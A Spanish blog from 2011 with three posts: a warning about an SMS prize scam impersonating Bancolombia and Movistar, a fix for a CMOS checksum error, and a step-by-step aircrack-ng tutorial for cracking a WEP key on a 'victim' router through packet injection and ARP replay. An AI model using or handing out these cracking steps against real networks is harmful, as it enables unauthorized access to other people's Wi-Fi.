9 de enero de 2011

Fraude por Mensajes de Texto (SMS)

BANCOLOMBIA Y MOVISTAR TE FELICITA POR SER EL GANADOR DE UNA TARJETA DEBITO DE $ 10.000.000 COMUNICATE AHORA PARA LA INF AL PBX: (3185900842 codigo0750)
De: 3185900842

Este es el nuevo mensaje que esta llegando a los usuarios de movistar Colombia para la realización de fraude, para tumbar a la gente.

Según movistar, ellos nunca envían mensajes de texto anunciando que ganaron, ellos lo publican en la pagina de ellos http://www.movistar.com.co/sitio/#I1&seccion=9&seccionInt=48 .

Este mensaje me llego el 8 de enero a las 4 de la tarde. Así que mucho Ojo.

4 de enero de 2011

CMOS checksum error - Defaults loaded

CMOS checksum error - Defaults loaded

Press F1 to continue, DEL to enter SETUP

... se daño la Bios....


El problema se presenta cuando la pila se ha acabado, la solución es poner una  pila nueva. Al cambiarla se debe reiniciar la Bios, volver a reiniciar la PC y listo, problema solucionado.

Otra falla presente es que al conectar la PC se enciende de una, es porque la Bios no esta guardando la información por falta de la pila (falta de energía); la Bios tiene una configuración que en caso de falla eléctrica se encienda de nuevo, en algunos casos.

Nota: Antes de cambiar la Pila consulta el manual de la Board antes de acerlo, y también como reiniciar la Bios.

http://es.kioskea.net/faq/120-cmos-checksum-error-default-loaded

http://es.wikipedia.org/wiki/BIOS

1 de enero de 2011

Aircrack PTW

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng.


Encontrar la clave WEP de una red WIFI por este método requiere que paquetes "arp request/reply", y solo trabaja con encriptacion de 128 y 64 bits. 


Cuando se usa aircrack v1.x es el ataque por defecto, para utilizar el anterior metodo se debe poner la opcion -k, para versiones anteriores de aircrack que soportan PTW se debe usar la opcion -z.


He utilizado este metodo que resulto ser muy efectivo con la version 0.9.1 en Windows, encontro la clave en menos de 1s'. 



Metodología usada:



  1. Poner la tarjeta en modo monitor: airmon-ng start rausb0
  2. Capturar los paquetes: airodump-ng -c [channel] -w [network] --bssid [bssid AP] rausb0
  3. Asociarse con el router victima: aireplay-ng -1 0 -a [BSSID AP] -h [MAC mia] -e [ESSID] rausb0
  4. Envio de ARP: aireplay-ng -3 -b [BSSID AP] -h [MAC mia] rausb0
    • En caso de que no se consigan: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC AP] -h [MAC mia] rausb0     --> Use this packet? y
    • Otra opción es intentar conectarse con otra tarjeta o lapto a esta red para forzar paquetes arp.
  5. Después de generar suficientes paquetes ejecutar Aircrack-ng -a 1 -z archivo.cap
Ejecutar cada ítem anterior en consolas independientes.

Mas documentación: